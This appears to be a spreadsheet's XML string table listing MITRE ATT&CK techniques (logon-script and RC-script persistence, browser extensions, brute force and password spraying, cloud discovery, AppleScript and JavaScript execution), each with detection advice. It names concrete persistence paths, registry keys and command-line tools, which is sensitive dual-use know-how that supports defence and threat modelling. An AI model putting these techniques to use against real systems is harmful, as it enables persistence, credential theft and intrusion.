  <si>
    <t>https://attack.mitre.org/techniques/T1547/013</t>
  </si>
  <si>
    <t>10 September 2019</t>
  </si>
  <si>
    <t>Malicious XDG autostart entries may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; and &lt;code&gt;~/.config/autostart&lt;/code&gt; directories. Depending on individual configurations, defenders may need to query the environment variables &lt;code&gt;$XDG_CONFIG_HOME&lt;/code&gt; or &lt;code&gt;$XDG_CONFIG_DIRS&lt;/code&gt; to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.
Suspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>User, root</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Logon Script (Mac)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)
Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>10 January 2020</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Logon Script (Windows)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/001</t>
  </si>
  <si>
    <t>Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1037.003</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Network Logon Script</t>
  </si>
  <si>
    <t>Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  
Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/003</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: RC Scripts</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries can establish persistence by adding a malicious binary path or shell commands to &lt;code&gt;rc.local&lt;/code&gt;, &lt;code&gt;rc.common&lt;/code&gt;, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/004</t>
  </si>
  <si>
    <t>15 January 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected changes to RC scripts in the &lt;code&gt;/etc/&lt;/code&gt; directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.
Monitor for &lt;code&gt;/etc/rc.local&lt;/code&gt; file creation. Although types of RC scripts vary for each Unix-like distribution, several execute &lt;code&gt;/etc/rc.local&lt;/code&gt; if present. </t>
  </si>
  <si>
    <t>T1037.005</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Startup Items</t>
  </si>
  <si>
    <t>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory. 
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/005</t>
  </si>
  <si>
    <t>The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1217</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
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t>
  </si>
  <si>
    <t>Mike Kemmerer</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the &lt;code&gt;profiles&lt;/code&gt; tool to install malicious &lt;code&gt;.mobileconfig&lt;/code&gt; files. In macOS 11+, the use of the &lt;code&gt;profiles&lt;/code&gt; tool can no longer install configuration profiles, however &lt;code&gt;.mobileconfig&lt;/code&gt; files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control.(Citation: Chrome Extension C2 Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
On macOS, monitor the command line for usage of the profiles tool, such as &lt;code&gt;profiles install -type=configuration&lt;/code&gt;. Additionally, all installed extensions maintain a &lt;code&gt;plist&lt;/code&gt; file in the &lt;code&gt;/Library/Managed Preferences/username/&lt;/code&gt; directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Chris Ross @xorrior; Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Ed Williams, Trustwave, SpiderLabs; Magno Logan, @magnologan, Trend Micro; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1110.004</t>
  </si>
  <si>
    <t>Brute Force: Credential Stuffing</t>
  </si>
  <si>
    <t>Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
Typically, management services over commonly used ports are used when stuffing credentials.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/004</t>
  </si>
  <si>
    <t>11 February 2020</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</t>
  </si>
  <si>
    <t>Anastasios Pingios; Diogo Fernandes</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Brute Force: Password Cracking</t>
  </si>
  <si>
    <t>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/002</t>
  </si>
  <si>
    <t>16 September 2020</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>Azure AD, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Brute Force: Password Guessing</t>
  </si>
  <si>
    <t>Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
Typically, management services over commonly used ports are used when guessing passwords.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</si>
  <si>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https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Brute Force: Password Spraying</t>
  </si>
  <si>
    <t>Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/003</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)
* Domain Controllers: "Audit Logon" (Success &amp; Failure) for event ID 4625.
* Domain Controllers: "Audit Kerberos Authentication Service" (Success &amp; Failure) for event ID 4771.
* All systems: "Audit Logon" (Success &amp; Failure) for event ID 4648.</t>
  </si>
  <si>
    <t>John Strand; Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote &lt;code&gt;build&lt;/code&gt; request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that &lt;code&gt;build&lt;/code&gt; API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1612</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.</t>
  </si>
  <si>
    <t>Containers</t>
  </si>
  <si>
    <t>Image: Image Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security; Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security; Roi Kol, @roykol1, Team Nautilus Aqua Security; Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the clipboard from users copying information within or between applications. 
In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>23 April 2020</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a &lt;code&gt;DescribeInstances&lt;/code&gt; API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the &lt;code&gt;ListBuckets&lt;/code&gt; API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the &lt;code&gt;gcloud compute instances list&lt;/code&gt; command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command &lt;code&gt;az vm list&lt;/code&gt; lists details of virtual machines.(Citation: Microsoft AZ CLI)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1580</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>IaaS</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Enumeration, Cloud Storage: Cloud Storage Metadata, Instance: Instance Enumeration, Instance: Instance Metadata, Snapshot: Snapshot Enumeration, Snapshot: Snapshot Metadata, Volume: Volume Enumeration, Volume: Volume Metadata</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>Cloud Service Dashboard</t>
  </si>
  <si>
    <t>An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1538</t>
  </si>
  <si>
    <t>30 August 2019</t>
  </si>
  <si>
    <t>Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. 
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1526</t>
  </si>
  <si>
    <t>Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration, Cloud Service: Cloud Service Metadata</t>
  </si>
  <si>
    <t>Praetorian; Suzy Schapperle - Microsoft Azure Red Team</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t>Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.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</si>
  <si>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Command: Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: AppleScript</t>
  </si>
  <si>
    <t>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding &lt;code&gt;#!/usr/bin/osascript&lt;/code&gt; to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call &lt;code&gt;osascript&lt;/code&gt; to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s &lt;code&gt;NSAppleScript&lt;/code&gt; or &lt;code&gt;OSAScript&lt;/code&gt;, both of which execute code independent of the &lt;code&gt;/usr/bin/osascript&lt;/code&gt; command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/002</t>
  </si>
  <si>
    <t>09 March 2020</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system.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[Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.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t>
  </si>
  <si>
    <t>Phil Stokes, SentinelOne</t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: JavaScript</t>
  </si>
  <si>
    <t>Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility &lt;code&gt;osascript&lt;/code&gt;, they can be compiled into applications or script files via &lt;code&gt;osacompile&lt;/code&gt;, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)
Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting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programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through &lt;code&gt;osascript&lt;/code&gt; and usage of &lt;code&gt;OSAScript&lt;/code&gt; API that may be related to other suspicious behavior occurring on the system.
